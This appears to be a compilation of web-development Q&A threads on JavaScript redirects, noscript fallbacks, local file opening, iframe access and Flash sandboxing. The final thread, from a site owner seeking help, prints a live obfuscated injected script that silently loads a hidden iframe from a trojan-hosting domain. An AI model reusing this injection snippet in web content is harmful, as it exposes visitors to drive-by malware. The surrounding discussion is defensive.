I am creating a personal website.So,its a very lightweight website!
The website uses jquery heavily.So if target browser doesn't have javascript enabled,my website would not work.
To resolve this issue I used this html
<html>
<head>
<script>
window.location.href="javascriptEnabled.html";
/*Since javascript is enabled redirect to javascript based page*/
</script>
</head>
<body>
Showing Static Website since javascript is not enabled..
</body>
</html>
As you can see,I am redirecting to javascript enabled page if the target browser supports it.
But if javascript is not enabled,the script would not work and then static html would be loaded which is in body tag!
I have two questions.
1>Is this the best way to resolve javacript-no javascript issue browser issue?
2>If I use window.location.href and the browser is javascript enabled,would it download the full page or would it stop at window.location.href?
To keep things simple, yes it's an OK idea. You can load content with <noscript> tags
As soon as the browser hits that window.location.href it will start redirecting, but it will still download all DOM. Browsers download all Document then it will start to render.
You can use: <body onload="document.body.style.display = 'none';"> to hide it's contents until redirect occurs.
Related
I want to open a local HTML file through Javascript using:
window.open ("file://C:/Users/wins/Desktop/exclusiveWordpress.html","mywindow");
But it is opening a new window with a blank page as we used to get when URL is not specified. How do I achieve this?
This worked for me fine:
File 1:
<html>
<head></head>
<body>
CLICK ME
</body>
<footer></footer>
</html>
File 2:
<html>
...
</html>
This method works regardless of whether or not the 2 files are in the same directory, BUT both files must be local.
For obvious security reasons, if File 1 is located on a remote server you absolutely cannot open a file on some client's host computer and trying to do so will open a blank target.
window.location.href = 'file://///fileserver/upload/Old_Upload/05_06_2019/THRESHOLD/BBH/Look/chrs/Delia';
Nothing Worked for me.
First, make sure that the source page and the target page are both served through the file URI scheme. You can't force an http page to open a file page (but it works the other way around).
Next, your script that calls window.open() should be invoked by a user-initiated event, such as clicks, keypresses and the like. Simply calling window.open() won't work.
You can test this right here in this question page. Run these in Chrome's JavaScript console:
// Does nothing
window.open('http://google.com');
// Click anywhere within this page and the new window opens
$(document.body).unbind('click').click(function() { window.open('http://google.com'); });
// This will open a new window, but it would be blank
$(document.body).unbind('click').click(function() { window.open('file:///path/to/a/local/html/file.html'); });
You can also test if this works with a local file. Here's a sample HTML file that simply loads jQuery:
<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js"></script>
</head>
<body>
<h5>Feel the presha</h5>
<h3>Come play my game, I'll test ya</h3>
<h1>Psycho- somatic- addict- insane!</h1>
</body>
</html>
Then open Chrome's JavaScript console and run the statements above. The 3rd one will now work.
I am having a huge problem. I need to prevent access to non javascript users for a page on my website. I am not very technical when it comes to websites, hmtl or java ect. But I have a page that i would like non javascript users to not be able to access. I have tried lots of code from here in my header and footer such as
<noscript>
<meta http-equiv="refresh" content="0; URL=nojs/index.php">
</noscript>
but it does not work.
To put this into more detail my problem is that a host a webpage with a list of download links. There is an app (web browser) for amazon devices (android) that accesses webpages and allows you to download but it comes with javascript disabled by default.
This means that my Ads dont show and i am now getting 40TB a month bandwidth usage from people using this software which means i may have to pull the site soon as it costs more to run than the ads give back.
I think i need to either block non javascript users. Or is there a way i can make my links on that page in javascript so that none javascript users cant see or use them?
In an ideal world i would just like to display a message saying please enable javascript in settings but i have tried many header codes with no success. Any help here greatly appreciated
I tried using the meta tag inside the noscript tags like you did, and it worked fine for me. Try using an absolute link to your nojs page instead of the relative one you have. I don't know of a way to completely block nonjs users. Another option would be to use the noscript tags to hide the content of your html pages when js is disabled. This won't completely disable nonjs users from seeing your pages since if they are tech-savy they could use inspect-element to unhide the page content, but for the most part it should do a good job of preventing nonjs users from viewing your page. You can also include a no script alert. For example:
<!DOCTYPE html>
<html>
<head>
<title>
</title>
<noscript>
<style>
div.content {
display: none;
}
</style>
</noscript>
</head>
<body>
<noscript>
Please enable Javascript to view this Page
</noscript>
<div class=content>
Page Content Here
</div>
</body>
</html>
I'm working on a private Chrome extension that injects some code into specific websites. I am successful for all except THIS 1 website (which I cant provide you with login access, sorry).
My extension doesn't detect the new(most) of the html content being loaded on the page after navigating through the site only.
For example, when I run document.documentElement.innerHTML; the return string is only the barebones of the page.
The site is using JQuery and I do have JQuery also loaded in my extension, but it still doesn't want to read any elements. The elements do show up in Developer Console but NOT on the Source Page or Frame's Source Page
I really need access to those Elements but I can't figure it out.
Any help is appreciated.
Thanks a bunch.
EDIT: Turns out nothing was working because all the new content was being loaded into an iFrame. Now I have to research iframes :(
This is what the code in the developer's tools looks like
<html>
<iframe src="..." >
#document
<html>
<div id="im trying to get">this content</div>
</html>
</iframe>
</html>
How can I disable flash from running in an iframe on my site?
We have a website where we give the user the option to view their site in an iframe on a makeshift mobile simulator. We wanted the user to see that their website doesn't look so great, but this doesn't work as intended for many reasons. I doesn't take into account meta-view port settings etc, but I'll figure that out later. The other problem is the flash works and don't want it to, so that they see that it wont run on iOS.
With the new HTML5 iframe sandbox attribute you can disable all plugins (including flash) in supported browswers by including the sandbox attribute. For example:
<!DOCTYPE html>
<html>
<head>
<style>iframe{height:9000px; width:100%;}</style>
</head>
<body>
<iframe sandbox="allow-scripts" src="http://www.adobe.com/software/flash/about/"/>
</body>
</html>
Will not display the flash animation, or version information. But the same code without the sandbox will:
<!DOCTYPE html>
<html>
<head>
<style>iframe{height:9000px; width:100%;}</style>
</head>
<body>
<iframe src="http://www.adobe.com/software/flash/about/"/>
</body>
</html>
Update - please see Rick's answer
The current HTML5 way is to use sandbox="allow-scripts" - this is explained in Rick's answer.
You can't control iframes on another domain from your site.
You can't run any scripts on them to remove/alter flash because of the same origin policy.
It's a security issue - imagine you could include and manipulate iframes. I could include an iframe containing http://nouveaus-bank.com and simulate events entering amounts and transferring money to my account in it.
There was an "allow-plugins" proposal for iframe sandboxing but it was rejected.
Your only option would be using a proxy on your site and putting it on your domain instead, or manipulating it on the server-side. If you can ask clients to include a code snippet on their side you can do a .postMessage and intercept it on the iframe asking it to remove the flash.
The server that has my website on it also has a virus on it.
The virus injects the malicious code
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.
I created a test file, with the following code:
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
</body>
</html>
It isn't pretty, but it served its purpose.
When viewing the page in my browser, I get
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
</body>
</html>
which can be viewed from www.sagamountain.com/testfile.html (warning, this page is infected)
I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.
It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?
Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don't go to that site!
EDIT: This is a followup to https://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459
I'm sorry that I can't answer your specific question, but I think that you're looking at this the wrong way. What you need to do is not strip out the virus-inserted html, what you need to do is talk to your web-host/sysadmin and strip out the virus.
Treating the symptoms won't cure the infection. Treating the disease, however, will also treat the symptoms as well as removing the virus.
The file that is in your server is a php file look in the comments here.
Cyber, if you have to wait on the server to be fixed by someone else, I'd say you should try ending your documents with an open <noscript> tag or open HTML comment tag.
You can't use Javascript to stop content that hasn't been rendered from doing so, unless you use document.write and one of the above tags (noscript/comment). Also you can't do anything by placing a script after, as it is already too late (the content is there already).
It is an ugly solution but should prevent your site visitors from experiencing the virus. It also makes your markup invalid, but any browser should be able to parse it and render it as you expect.
Best of luck with the server!